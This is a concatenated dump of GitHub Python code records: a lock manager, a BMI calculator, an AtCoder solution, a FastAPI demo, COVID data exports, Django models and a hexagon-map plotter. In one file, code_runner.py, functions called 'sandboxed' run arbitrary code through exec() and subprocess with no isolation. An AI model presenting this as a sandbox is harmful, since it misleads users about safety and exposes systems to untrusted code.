\"unlocked\" and boolean_lock_device_state == \"on\":\n self.turn_off(self.boolean_lock_deviceid)\n self.log(\"status updated to: \" +lockstatus[\"lock_state\"])\n elif lockstatus[\"lock_state\"] == \"locked\" or lockstatus[\"lock_state\"] == \"unlocked\":\n self.log(\"Nothing to update. lock_state: \" +lockstatus[\"lock_state\"])\n else:\n self.log(\"Periodic update, Unknown lock_state: \"+lockstatus[\"lock_state\"])\n self.call_service(self.push_notifiy_intity, message=\"Periodic update, Unknown lock_state: \"+lockstatus[\"lock_state\"])\n\n","repo_name":"wbsoul/SwitchBotLockManager","sub_path":"switchbotlockmanager.py","file_name":"switchbotlockmanager.py","file_ext":"py","file_size_in_byte":5016,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"72291004072","text":"import tkinter\n\nwindow = tkinter.Tk()\nwindow.title(\"BMI Calculator\")\nwindow.minsize(width=250,height=210)\nboslukLabel = tkinter.Label(text=\"\")\nboslukLabel.pack()\n\nboslukLabel1 = tkinter.Label(text=\"\")\nboslukLabel2 = tkinter.Label(text=\"\")\n\n#weight\nweightLabel = tkinter.Label(text=\"Enter Your Weight (kg)\")\nweightLabel.pack()\n\ndef getentryWeight ():\n height = heightEntry.get()\n weight = weightEntry.get()\n\n if weight == \"\" or height == \"\":\n resultLabel.config(text=\"Enter Weight and Height !!\")\n else:\n try:\n bmi = float(weight) / (float(height) / 100) ** 2\n resultString = writeResult(bmi)\n resultLabel.config(text=resultString)\n except:\n resultLabel.config(text=\"Enter a valid Number\")\n\nweightEntry = tkinter.Entry(width=20)\nweightEntry.pack()\n\n#bosluk label\n\nboslukLabel2.pack()\n\n#height\n\nheightLabel = tkinter.Label(text=\"Enter Your Height (cm)\")\nheightLabel.pack()\n\n\nheightEntry = tkinter.Entry(width=20)\nheightEntry.pack()\n\n\nboslukLabel1.pack()\n\nButton = tkinter.Button(text=\"Calculate\",command=getentryWeight)\nButton.pack()\n\nresultLabel = tkinter.Label()\nresultLabel.pack()\n\ndef writeResult (bmi):\n resultString = f\"Your BMI is : {round(bmi, 2)}. You are \"\n if bmi <= 16:\n resultString += \"severely thin !\"\n elif 16 < bmi <= 17:\n resultString += \"moderately thin\"\n elif 17 < bmi <= 17-18.5:\n resultString += \"mild thin\"\n elif 18.5 < bmi <= 25:\n resultString += \"normal\"\n elif 25 < bmi <= 30:\n resultString += \"overweight\"\n elif 30 < bmi <= 35:\n resultString += \"obese class 1 !\"\n elif 35 < bmi <= 40:\n resultString += \"obese class 2 !!\"\n else:\n resultString += \"obese class 3 !!!\"\n\n return resultString\n\nwindow.mainloop()\n","repo_name":"wancett/bmiCalculator","sub_path":"BMI_Calculator.py","file_name":"BMI_Calculator.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15107378069","text":"N=int(input())\nxyh=sorted([list(map(int, input().split())) for _ in range(N)], key=lambda x: x[2], reverse=True)\n\ndef find(cx, cy, H):\n\tfor x,y,h in xyh:\n\t\tif h != max(H-abs(x-cx)-abs(y-cy), 0):\n\t\t\treturn False\n\treturn True\n\ndef solve():\n\tfor cx in range(101):\n\t\tfor cy in range(101):\n\t\t\tx,y,h = xyh[0]\n\t\t\tH = h + abs(x-cx) + abs(y-cy)\n\t\t\tif find(cx, cy, H):\n\t\t\t\treturn \"%d %d %d\" % (cx, cy, H)\n\traise Exception\n\nprint(solve())","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc112/C/4915849.py","file_name":"4915849.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"19533875288","text":"#code_runner.py\nimport os\nimport subprocess\ndef execute_sandboxed_code(code, language):\n if language == \"python\":\n return execute_python_sandboxed(code)\n elif language == \"c\":\n return execute_c_sandboxed(code)\n elif language == \"java\":\n return execute_java_sandboxed(code)\n elif language == \"exe\":\n return execute_exe_sandboxed(code)\n elif language == \"net\":\n return execute_net_sandboxed(code)\n elif language == \"rust\":\n return execute_rust_sandboxed(code)\n\ndef execute_python_sandboxed(code):\n try:\n exec(code, {})\n return \"Code executed successfully.\"\n except Exception as e:\n return f\"Error executing Python code: {e}\"\n\ndef execute_c_sandboxed(code):\n with open(\"temp.c\", \"w\") as f:\n f.write(code)\n\n try:\n subprocess.run([\"gcc\", \"temp.c\", \"-o\", \"temp\"], check=True)\n result = subprocess.run([\"./temp\"], stdout=subprocess.PIPE, text=True)\n return result.stdout\n except subprocess.CalledProcessError as e:\n return f\"Error compiling or running C code: {e}\"\n\ndef execute_java_sandboxed(code):\n with open(\"Temp.java\", \"w\") as f:\n f.write(code)\n\n try:\n subprocess.run([\"javac\", \"Temp.java\"], check=True)\n result = subprocess.run([\"java\", \"Temp\"], stdout=subprocess.PIPE, text=True)\n return result.stdout\n except subprocess.CalledProcessError as e:\n return f\"Error compiling or running Java code: {e}\"\n\ndef execute_exe_sandboxed(exe_path):\n try:\n result = subprocess.run([exe_path], stdout=subprocess.PIPE, text=True)\n return result.stdout\n except subprocess.CalledProcessError as e:\n return f\"Error running the .exe file: {e}\"\n\ndef execute_net_sandboxed(code):\n try:\n with open(\"temp.cs\", \"w\") as f:\n f.write(code)\n result = subprocess.run([\"dotnet\", \"run\", \"--no-build\", \"--project\", \"temp.csproj\"], stdout=subprocess.PIPE, text=True)\n return result.stdout\n except subprocess.CalledProcessError as e:\n return f\"Error running .NET code: {e}\"\n\ndef execute_rust_sandboxed(code):\n try:\n with open(\"temp.rs\", \"w\") as f:\n f.write(code)\n subprocess.run([\"rustc\", \"temp.rs\", \"-o\", \"temp\"], check=True)\n result = subprocess.run([\"./temp\"], stdout=subprocess.PIPE, text=True)\n return result.stdout\n except subprocess.CalledProcessError as e:\n return f\"Error compiling or running Rust code: {e}\"\n\ndef execute_code(language, code):\n if language not in [\"python\", \"c\", \"java\", \"exe\", \"net\", \"rust\"]:\n return \"Unsupported language.\"\n\n result = execute_sandboxed_code(code, language)\n return result\n\ndef find_files_with_extension(root_dir, extension):\n found_files = []\n for root, _, files in os.walk(root_dir):\n for file in files:\n if file.endswith(extension):\n found_files.append(os.path.join(root, file))\n return found_files\n\ndef main():\n execution_option = input(\"Choose an option:\\n1. Execute code from a file\\n2. Execute code directly\\n3. quit\\n\")\n\n if execution_option == \"1\":\n language = input(\"Enter a programming language (python, c, java, exe, net, rust): \")\n extension_mapping = {\n \"python\": \".py\",\n \"c\": \".c\",\n \"java\": \".java\",\n \"exe\": \".exe\",\n \"net\": \".cs\",\n \"rust\": \".rs\"\n }\n\n if language not in extension_mapping:\n print(\"Unsupported language.\")\n return\n\n root_folder = os.getcwd() # Get the current working directory as the root folder\n file_extension = extension_mapping[language]\n matching_files = find_files_with_extension(root_folder, file_extension)\n\n if not matching_files:\n print(f\"No {language} files found in the specified folder and its subfolders.\")\n return\n\n print(f\"Found {len(matching_files)} {language} files:\")\n for i, file_path in enumerate(matching_files, start=1):\n print(f\"{i}. {file_path}\")\n\n file_number = int(input(\"Select a file number to execute: \")) - 1\n\n try:\n if language in [\"exe\", \"net\", \"rust\"]:\n selected_file = matching_files[file_number]\n else:\n with open(matching_files[file_number], \"r\") as f:\n code = f.read()\n except IndexError:\n print(\"Invalid file number.\")\n return\n except FileNotFoundError:\n print(\"Selected file not found.\")\n return\n\n elif execution_option == \"2\":\n language = input(\"Enter a programming language (python, c, java, exe, net, rust): \")\n if language in [\"exe\", \"net\", \"rust\"]:\n selected_file = input(f\"Enter the path to the {language} file: \")\n else:\n code = input(\"Enter the code:\\n\")\n elif execution_option ==\"3\":\n print(\"Exiting...\")\n return\n\n else:\n print(\"Invalid option.\")\n return\n\n if language in [\"exe\", \"net\", \"rust\"]:\n output = execute_code(language, selected_file)\n else:\n output = execute_code(language, code)\n print(output)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Okerew/Py-OS","sub_path":"code_runner.py","file_name":"code_runner.py","file_ext":"py","file_size_in_byte":5235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11024902261","text":"# pip install fastapi\n# pip install uvicorn\nfrom typing import List\n\nimport fastapi\nimport uvicorn\nimport pydantic\n\napp = fastapi.FastAPI()\n\napp.fruits = [\n {'name': 'apple', 'color': 'red', 'taste': 'sweet'},\n {'name': 'banana', 'color': 'yellow', 'taste': 'sweet'},\n {'name': 'tomato', 'color': 'red', 'taste': 'sweet'}\n]\n\n\nclass Fruit(pydantic.BaseModel):\n name: str\n color: str\n taste: str\n\n\n# GET SINGLE\n@app.get('/fruits/{name}', response_model=Fruit)\ndef retrieve_fruit(name):\n for fruit in app.fruits:\n if fruit['name'] == name:\n return fruit\n\n return None\n\n\n# GET ALL\n@app.get('/fruits', response_model=List[Fruit])\ndef retrieve_fruits():\n return app.fruits\n\n\n# POST\n@app.post('/fruits', response_model=Fruit)\ndef create_fruit(data: Fruit):\n app.fruits.append(data.dict())\n return data\n\n\n# PUT\n@app.put('/fruits/{name}', response_model=Fruit)\ndef update_fruit(data: Fruit, name):\n new_fruits = []\n for fruit in app.fruits:\n if fruit['name'] != name:\n new_fruits.append(fruit)\n\n new_fruits.append(data.dict())\n app.fruits = new_fruits\n\n return data\n\n\n# DELETE\n@app.delete('/fruits/{name}')\ndef delete_fruit(name):\n new_fruits = []\n for fruit in app.fruits:\n if fruit['name'] != name:\n new_fruits.append(fruit)\n app.fruits = new_fruits\n return None\n\n\nuvicorn.run(app, host='0.0.0.0', port=9001)\n","repo_name":"mpdevilleres/python-study-2021","sub_path":"day6/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7014397577","text":"import sys\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtPrintSupport import *\n\n\nclass Window(QWidget):\n def __init__(self):\n super(Window, self).__init__()\n self.edit = QTextEdit()\n self.print_btn = QPushButton('打印')\n self.print_btn.clicked.connect(self.print_text)\n\n self.printer = QPrinter()\n\n v_layout = QVBoxLayout()\n v_layout.addWidget(self.edit)\n v_layout.addWidget(self.print_btn)\n self.setLayout(v_layout)\n\n def print_text(self):\n print_dialog = QPrintDialog(self.printer)\n if print_dialog.exec():\n self.edit.print(self.printer)\n\n\nif __name__ == '__main__':\n app = QApplication([])\n window = Window()\n window.show()\n sys.exit(app.exec())","repo_name":"la-vie-est-belle/book-codes","sub_path":"第6章/示例代码6-15/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4075793159","text":"from pathlib import Path\nimport itertools\n\nimport pandas as pd\nimport numpy as np\nimport re\nimport datetime\n#from utils import convert_to_int\n\npd.set_option('display.max_columns', None)\npd.set_option('display.width', 1000)\n\nDATA_FOLDER = Path(\"data-desc\")\n\nVARIABLES = [\n \"Totaal\",\n \"Ziekenhuisopname\",\n \"Overleden\"\n]\n\n\ndef get_timeline():\n\n df = pd.read_csv(Path(\"data\", \"rivm_NL_covid19_sex.csv\"))\n dates = sorted(df[\"Datum\"].unique())\n\n return dates\n\n\ndef export_date(df, data_folder, prefix, data_date=None, label=None):\n\n if data_date:\n df_date = df.loc[df[\"Datum\"] == data_date, :]\n else:\n df_date = df\n\n # export with data date\n if label is not None:\n export_path = Path(DATA_FOLDER, data_folder, f\"{prefix}_{label}.csv\")\n else:\n export_path = Path(DATA_FOLDER, data_folder, f\"{prefix}.csv\")\n\n print(f\"Export {export_path}\")\n df_date.to_csv(export_path, index=False)\n\n\n\ndef main_sex():\n\n df_reported = pd.read_csv(Path(\"data-desc\", \"data-sex\", \"RIVM_NL_sex.csv\"))\n df_reported[\"Aantal\"] = df_reported[\"Aantal\"].astype(pd.Int64Dtype())\n\n dates = sorted(df_reported[\"Datum\"].unique())\n\n # export by date\n for data_date in dates:\n\n export_date(df_reported, \"data-sex\", \"RIVM_NL_sex\", data_date, str(data_date).replace(\"-\", \"\"))\n\n # export latest\n export_date(df_reported, \"data-sex\", \"RIVM_NL_sex\", data_date=dates[-1], label=\"latest\")\n\n\ndef main_age():\n\n df_reported = pd.read_csv(Path(\"data-desc\", \"data-age\", \"RIVM_NL_age.csv\"))\n df_reported[\"Aantal\"] = df_reported[\"Aantal\"].astype(pd.Int64Dtype())\n\n dates = sorted(df_reported[\"Datum\"].unique())\n\n # export by date\n for data_date in dates:\n\n export_date(df_reported, \"data-age\", \"RIVM_NL_age\", data_date, str(data_date).replace(\"-\", \"\"))\n\n # export latest\n export_date(df_reported, \"data-age\", \"RIVM_NL_age\", data_date=dates[-1], label=\"latest\")\n\n\ndef main_age_sex():\n\n DATA_FOLDER_INPUT = Path(\"raw_data/website_charts\")\n files = DATA_FOLDER_INPUT.glob('*leeftijd-en-geslacht-overledenen*')\n\n df = []\n for file in files:\n match = re.search('\\d{4}-\\d{2}-\\d{2}', f'{file}')\n date = datetime.datetime.strptime(match.group(), '%Y-%m-%d').date()\n\n new = pd.read_csv(file, sep = ';')\n new['Datum'] = date\n\n genders = ['Vrouw', 'Man']\n\n for geslacht in genders:\n new_man = new[[\n \"Datum\",\n \"Leeftijdsgroep\",\n geslacht\n ]]\n\n new_man['Geslacht'] = geslacht\n new_man = new_man.rename(columns={geslacht:'AantalCumulatief', 'Leeftijdsgroep':'LeeftijdGroep'})\n\n df.append(new_man)\n\n\n df_reported = pd.concat(df, axis=0, ignore_index=True)\n df_reported = df_reported.sort_values(by = ['Datum', 'Geslacht', 'LeeftijdGroep'])\n\n df_reported[\"Aantal\"] = df_reported \\\n .groupby(['Geslacht', 'LeeftijdGroep'], sort=True)['AantalCumulatief'] \\\n .transform(pd.Series.diff)\n\n df_reported.loc[df_reported[\"Datum\"] == sorted(df_reported[\"Datum\"].unique())[0], \"Aantal\"] = \\\n df_reported.loc[df_reported[\"Datum\"] == sorted(df_reported[\"Datum\"].unique())[0], \"AantalCumulatief\"]\n\n df_reported['Aantal'] = df_reported[\"Aantal\"].astype(pd.Int64Dtype())\n\n Path(DATA_FOLDER, \"data-deceased\").mkdir(exist_ok=True)\n\n df_reported = df_reported[[\n \"Datum\",\n \"LeeftijdGroep\",\n \"Geslacht\",\n \"Aantal\",\n \"AantalCumulatief\"\n ]]\n\n dates = sorted(df_reported[\"Datum\"].unique())\n\n # export by date\n for data_date in dates:\n\n export_date(df_reported, \"data-deceased\", \"RIVM_NL_deceased_age_sex\", data_date, str(data_date).replace(\"-\", \"\"))\n\n # export latest\n export_date(df_reported, \"data-deceased\", \"RIVM_NL_deceased_age_sex\", data_date=dates[-1], label=\"latest\")\n\n # export all\n export_date(df_reported, \"data-deceased\", \"RIVM_NL_deceased_age_sex\", data_date=None, label=None)\n\n\n\nif __name__ == '__main__':\n\n DATA_FOLDER.mkdir(exist_ok=True)\n\n main_sex()\n\n main_age()\n\n main_age_sex()\n\n\n","repo_name":"J535D165/CoronaWatchNL","sub_path":"workflows/rivm/data_rivm_desc.py","file_name":"data_rivm_desc.py","file_ext":"py","file_size_in_byte":4092,"program_lang":"python","lang":"en","doc_type":"code","stars":144,"dataset":"github-code","pt":"72"} +{"seq_id":"24817651296","text":"from __future__ import unicode_literals\n\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom django.contrib.postgres.fields import JSONField\n\nfrom address.models import AddressField\nfrom andablog.models import Entry\n\nfrom social.apps.django_app.default.models import UserSocialAuth\nfrom datetime import datetime\n\n# RIDE STUFF\nclass Campaign(models.Model):\n created_at = models.DateTimeField(auto_now=True)\n owner = models.ForeignKey(User, blank=True, null=True)\n name = models.CharField(max_length=128, blank=False, null=False)\n about = models.TextField(blank=True, null=True)\n\n def __unicode__(self):\n return self.name\n\nclass Ride(models.Model):\n uploaded = models.DateTimeField(auto_now=True)\n campaign = models.ForeignKey(Campaign)\n trackfile = models.FileField(upload_to='rides')\n\n def __unicode__(self):\n return self.trackfile.name\n\nclass Course(models.Model):\n uploaded = models.DateTimeField(auto_now=True)\n campaign = models.ForeignKey(Campaign)\n trackfile = models.FileField(upload_to='courses')\n\n def __unicode__(self):\n return self.trackfile.name\n\nclass PointOfInterest(models.Model):\n created_at = models.DateTimeField(default=datetime.now)\n campaign = models.ForeignKey(Campaign, null=False, blank=False)\n lat = models.DecimalField(max_digits=9, decimal_places=6)\n lng = models.DecimalField(max_digits=9, decimal_places=6)\n\nclass EntryPointOfInterest(models.Model):\n poi = models.ForeignKey(PointOfInterest, null=False)\n entry = models.ForeignKey(Entry, null=False, blank=False)\n\nclass InstagramPointOfInterest(models.Model):\n poi = models.ForeignKey(PointOfInterest, null=False)\n user_social_auth = models.ForeignKey(UserSocialAuth, blank=False, null=False)\n shortcode = models.CharField(max_length=128, blank=False, null=False)\n cached_response = JSONField(default=dict)\n\nclass TextPointOfInterest(models.Model):\n poi = models.ForeignKey(PointOfInterest, null=False)\n text = models.TextField()\n\n# FINANCIALS\nclass FinancialCategory(models.Model):\n user = models.ForeignKey(User)\n name = models.CharField(max_length=128, unique=True, null=False, blank=False)\n\nclass FinancialEntry(models.Model):\n user = models.ForeignKey(User)\n campaign = models.ForeignKey(Campaign, null=True, blank=True)\n category = models.ForeignKey(FinancialCategory)\n value = models.DecimalField(max_digits=12, decimal_places=2)\n\n# MISC. STUFF\nclass Contact(models.Model):\n user = models.ForeignKey(User, null=True, blank=True)\n name = models.CharField(max_length=128)\n phone_number = models.CharField(max_length=128, null=True, blank=True)\n address = AddressField(null=True, blank=True)\n notes = models.TextField(null=True, blank=True)\n","repo_name":"qpfiffer/blackdog","sub_path":"home/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2779,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"403442732","text":"ten = [i for i in range(1,11)]\nevens = list(filter(lambda x: x % 2 == 0, ten))\nup = list(map(lambda x: x**2, evens))\n\nprint(f'Сгенерированный список ten от 1 до 10: {ten}')\nprint(f'Четные числа из списка ten {evens}')\nprint(f'Возведенные в квадрат числа из списка evens {up}')\n\ndef show_Idx(lst= ten):\n try:\n print(lst)\n Idx = int(input('Введите индекс объекта из списка который хотите вывести: '))\n if Idx > 0 and Idx <= len(lst) - 1:\n print(f'Под индексом: {Idx} находится объект: {lst[Idx]}')\n else:\n print(f\"Пишите индекс только от 0 до {len(lst) - 1}\")\n except Exception:\n print(\"Введите только числа!\")\n\n\nwhile 1:\n comand = input('Выбери действия: \\n1)Вывести элемент по индексу\\n0)Выход\\n')\n if comand == '1':\n show_Idx()\n elif comand == '0':\n print(\"Program finished\")\n break\n else:\n print('Нет такой меню пишите только числа 1 или 0!')\n continue","repo_name":"mirlan312/HomWorks","sub_path":"venv/Include/mirlan_idirisov_hw_6.py","file_name":"mirlan_idirisov_hw_6.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21388382804","text":"import csv\nfrom ast import literal_eval as make_tuple\nimport fiona\nimport numpy as np\nimport itertools\nimport random\nimport pickle\nimport rasterio\nfrom rasterio import features\nfrom shapely.geometry import shape\nimport subprocess\nimport re\nimport math\nimport sys\n\n\ndef zeropad_filename(fn,n=4):\n return re.sub(\n '(\\d+)',\n lambda m: m.group().zfill(n),\n fn)\n\nflatten = lambda l: [item for sublist in l for item in sublist]\n\n\n\ndef convert_size(size_bytes):\n if size_bytes == 0:\n return \"0B\"\n size_name = (\"B\", \"KB\", \"MB\", \"GB\", \"TB\", \"PB\", \"EB\", \"ZB\", \"YB\")\n i = int(math.floor(math.log(size_bytes, 1024)))\n p = math.pow(1024, i)\n s = round(size_bytes / p, 2)\n return \"%s %s\" % (s, size_name[i])\n\n\nclass HexNeighbors:\n \"\"\" Provides cached methods to get the indicies of neighboring cells in hexagonal grid\n\n Methods for finding neighbors in a hexgaonal grid. Assumes hexgonal grid uses\n axial coordinate system x,y,z (http://www.redblobgames.com/grids/hexagons/#coordinates).\n Coordinates are calculated for a rings of hexagons, with caching to speed the process\n for repeat calls to the class.\n\n \"\"\"\n\n def __init__(self):\n self.cache = {}\n\n def get_ring_offset(self, distance):\n \"\"\"\n Return the indices for a ring of hexagons at 'distance' from an origin hexagon of (0,0,0)\n :param distance: int\n :return: list\n \"\"\"\n if distance in self.cache:\n return self.cache[distance]\n else:\n coords_positive = list(zip(range(0, distance + 1), range(distance, -1, -1)))\n coords_negative = list(zip(range(-distance, 1), range(0, -distance - 1, -1)))\n\n all_coords = list(set(itertools.chain([(x, y, -distance) for (x, y) in coords_positive],\n [(-distance, y, z) for (z, y) in coords_positive],\n [(x, -distance, z) for (z, x) in coords_positive],\n [(x, y, distance) for (x, y) in coords_negative],\n [(x, distance, z) for (x, z) in coords_negative],\n [(distance, y, z) for (z, y) in coords_negative])))\n\n self.cache[distance] = all_coords\n print(\"cache extended to {} units ({})\".format(distance, convert_size(sys.getsizeof(self.cache))))\n\n return all_coords\n\n def get_radius_offset(self, distance):\n \"\"\"\n Return indices of all hexagons within radius 'distance'.\n :param distance: int\n :return: list\n \"\"\"\n return flatten([self.get_ring_offset(i) for i in range(distance + 1)])\n\n def get_ring_coords(self, distance, origin=(0, 0, 0)):\n \"\"\"\n Return indices of all hexagons in a ring at 'distance' from specified origin.\n :param distance: int\n :param origin: tuple\n :return: list\n \"\"\"\n x_, y_, z_ = origin\n return [(x_ + x, y_ + y, z_ + z) for x, y, z in self.get_ring_offset(distance)]\n\n def get_radius_coords(self, distance, origin=(0, 0, 0)):\n x_, y_, z_ = origin\n return [(x_ + x, y_ + y, z_ + z) for x, y, z in self.get_radius_offset(distance)]\n\n\ndef inv_logit(p):\n \"\"\"Return inverse logit of p\"\"\"\n return np.exp(p) / (1 + np.exp(p))\n\n\nclass IBMmap:\n def __init__(self):\n self.hexes = {}\n self.neighbor_manager = HexNeighbors()\n # Sim annealing variable\n self.T = 1\n self.T_min = 0.00001\n self.alpha = 0.9\n\n def pickle(self, path):\n with open(path, 'wb') as hex_pickle:\n return pickle.dump(self.hexes, hex_pickle)\n\n def from_pickle(self, path):\n with open(path, 'rb') as hex_pickle:\n self.hexes = pickle.load(hex_pickle)\n\n def get_neighbors(self, hex, distance):\n return [self.hexes.get(hex) for hex in self.neighbor_manager.get_radius_coords(distance, hex.axial_coords)]\n\n def get_neighbors_ring(self, hex, distance):\n return [self.hexes.get(hex) for hex in self.neighbor_manager.get_ring_coords(distance, hex.axial_coords)]\n\n def get_suitability(self, hexes=None):\n if not hexes:\n self.suitability = np.nansum(\n [self.hexes[hex].get_quality() for hex in self.hexes if self.hexes[hex].properties['occupied'] == 1])\n return self.suitability\n else:\n return np.nansum(\n [self.hexes[hex].get_quality() for hex in hexes if self.hexes[hex].properties['occupied'] == 1])\n\n def get_occupied(self):\n self.occupied = set([hex for hex in self.hexes if self.hexes[hex].properties['occupied'] == 1])\n\n def get_unoccupied(self):\n self.unoccupied = set([hex for hex in self.hexes if self.hexes[hex].properties['occupied'] == 0])\n\n def set_keys_list(self):\n self.keys_list = list(self.hexes)\n\n def accept(self, new, old):\n return np.exp((new - old) / self.T) > random.random()\n\n def test_accept(self):\n backupT = self.T\n self.T = 1\n assert self.accept(1, 0) == True\n print(\"annealing acceptance test 1 passed\")\n\n self.T = 0.0000001\n assert self.accept(1, 0) == True\n print(\"annealing acceptance test 2 passed\")\n\n self.T = 10\n assert self.accept(0, 1) == True\n print(\"annealing acceptance test 3 passed\")\n\n self.T = 0.0000001\n assert self.accept(0, 1) == False\n print(\"all annealing acceptance tests passed\")\n self.T = backupT\n\n def update_T(self):\n self.T = max(self.T * self.alpha, self.T_min)\n\n def switch(self):\n found_occupied = False\n found_unoccupied = False\n while not found_occupied:\n occ = random.sample(self.keys_list, 1)[0]\n found_occupied = self.hexes[occ].properties['occupied'] == 1\n while not found_unoccupied:\n unocc = random.sample(self.keys_list, 1)[0]\n found_unoccupied = self.hexes[unocc].properties['occupied'] == 0\n previous_suitability = self.hexes[occ].get_quality()\n new_suitability = self.hexes[unocc].get_quality()\n # if new_suitability >= previous_suitability:\n # self.hexes[occ].properties['occupied'] = 0\n # self.hexes[unocc].properties['occupied'] = 1\n if self.accept(new_suitability, previous_suitability):\n self.hexes[occ].properties['occupied'] = 0\n self.hexes[unocc].properties['occupied'] = 1\n\n\nclass Hex:\n def __init__(self, grid, axial, properties):\n self.grid = grid\n self.axial_coords = axial\n self.properties = properties\n self.fon = False\n\n def __repr__(self):\n return \"Hex at {} {} {}\".format(*self.axial_coords)\n\n @property\n def fono(self):\n if not self.fon:\n self.fon = self.grid.get_neighbors(self, 1)\n return np.sum([x.properties['occupied'] for x in self.fon if x is not None])\n\n def get_neighbors(self, distance):\n return self.grid.get_neighbors(self, distance)\n\n def get_neighbors_ring(self, distance):\n return self.grid.get_neighbors_ring(self, distance)\n\n def get_quality(self):\n p = -3.6 - 0.0004 * self.properties['flow'] - 0.0005 * self.properties['distance'] + 0.0005 * self.properties[\n 'elevation'] + 1.6 * self.fono\n return inv_logit(p)\n\n\ndef load_state(path):\n with open(path, 'r') as f:\n reader = csv.reader(f)\n hexkeys = [make_tuple(key[0]) for key in reader]\n return hexkeys\n\n\ndef parse_filename(self, filename: str):\n return int(filename.split('_')[0])\n\nclass CstLineHolder:\n def __init__(self):\n self.properties = {}\n with fiona.collection('coastline/beagle_cst.shp', 'r') as layer:\n for element in layer:\n self.properties['geom'] = shape(element['geometry'])\n self.properties['col'] = 100\n\ndef load_ages(path):\n with open(path, 'r') as f:\n reader = csv.reader(f)\n ages = [int(row[1]) for row in reader]\n return ages\n\nclass Plotter:\n def __init__(self):\n self.transform = [-2398667.8006973956,\n 0.06537704951100207,\n 0.0,\n 1700808.706766952,\n 0.0,\n -0.3837805797099703]\n self.shape = (3735, 18220)\n\n self.keys = None\n self.template = IBMmap()\n self.template.from_pickle('hex_map_sim_anneal')\n self.template.hexes['COASTLINE'] = CstLineHolder()\n print(\"template loaded.\")\n\n self.temp_files = []\n\n def _shapes(self):\n return ((self.template.hexes[key].properties['geom'], age) for key,age in zip(self.keys,self.ages))\n\n def rasterise_keys(self, keys):\n self.keys = ['COASTLINE']\n self.keys += keys\n return features.rasterize(self._shapes(), out_shape=self.shape, transform=self.transform)\n\n def reconstruct(self, path):\n outpath = os.path.split(path)[0]\n print(\"outpath : \",outpath)\n filename = os.path.splitext(os.path.split(path)[1])[0]\n out_filename = zeropad_filename(filename)\n print(\"outfilename : \",out_filename)\n out_filename = '{}.tif'.format(os.path.join(outpath,out_filename))\n print(\"outfilename : \",out_filename)\n keys = load_state(path=path)\n self.ages = [255] + load_ages(path=path)\n image = self.rasterise_keys(keys)\n print('rasterised')\n with rasterio.open(out_filename, 'w', driver='GTiff', width=1000, height=1000, count=1,\n dtype='uint8') as dst:\n dst.write(image, 1)\n dst.write_colormap(\n\n 1, {\n\n 0: (229, 245, 249),\n 1: (214, 238, 236),\n 2: (198, 231, 223),\n 3: (183, 224, 211),\n 4: (167, 217, 198),\n 5: (152, 210, 185),\n 6: (136, 203, 172),\n 7: (121, 197, 159),\n 8: (106, 190, 146),\n 9: (90, 183, 133),\n 10: (75, 176, 121),\n 11: (59, 169, 108),\n 12: (44, 162, 95),\n 13: (44, 162, 95),\n 14: (44, 162, 95),\n 15: (44, 162, 95),\n 16: (44, 162, 95),\n 17: (44, 162, 95),\n 18: (44, 162, 95),\n 19: (44, 162, 95),\n 20: (44, 162, 95),\n 21: (44, 162, 95),\n 22: (44, 162, 95),\n 23: (44, 162, 95),\n 24: (44, 162, 95),\n 25: (44, 162, 95) })\n self.temp_files.append(out_filename)\n\n def to_video(self,path):\n result_code = subprocess.call(\"ffmpeg -framerate 25 -pattern_type glob -i '{}*_state.tif' {}output.mp4 -y\".format(path,path), shell=True)\n\n def clean_up(self):\n while self.temp_files:\n file = self.temp_files.pop()\n os.remove(file)\n print(\"removed tmp file {}\".format(file))\n \nif __name__ == \"__main__\":\n import glob\n import os\n\n root = 'output'\n plotter = Plotter()\n\n for p in os.listdir(root):\n path = os.path.join(root,p+\"/\")\n print(\"searching in {}\".format(path))\n paths = glob.glob(path+'*_state.csv')\n print('paths = ',paths)\n for image_path in paths:\n print('path = ',image_path)\n plotter.reconstruct(image_path)\n # plotter.to_video(path)\n # plotter.clean_up()\n\n\n\n\n","repo_name":"emmatalis/emma_hexibm","sub_path":"plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":11398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71808695913","text":"import os\nfrom functools import partial\nfrom os import PathLike\nfrom pathlib import Path\nfrom typing import Callable, Union\nfrom typing import Any\n\nfrom gemtoolsio import load_string, load_file, load_encrypted_file\n\nfrom .exceptions import critical, ArgumentError\n\nKEY_RESULT = '__result__'\n\nDEFAULT_PATH = '.'\n\nDEFAULT_CONFIG_PATH = 'config.toml'\n\n_MISSING = object()\n\n\ndef get_argument(kwargs: dict,\n name: str,\n default: Any = _MISSING,\n choices: list[Any] = None\n ) -> Any:\n \"\"\"\n Return the value of the specified argument from a dictionary of keyword arguments.\n\n :param kwargs: A dictionary of keyword arguments to search for the specified argument name.\n :type kwargs: dict\n :param name: The name of the argument to retrieve.\n :type name: str\n :param default: The default value to return if the argument is not present in kwargs.\n Defaults to _MISSING, which indicates that no default value is specified.\n :type default: Any, optional\n :param choices: A list of valid choices for the argument value. If specified and the argument\n value is not in the list, raise an ArgumentError.\n :type choices: 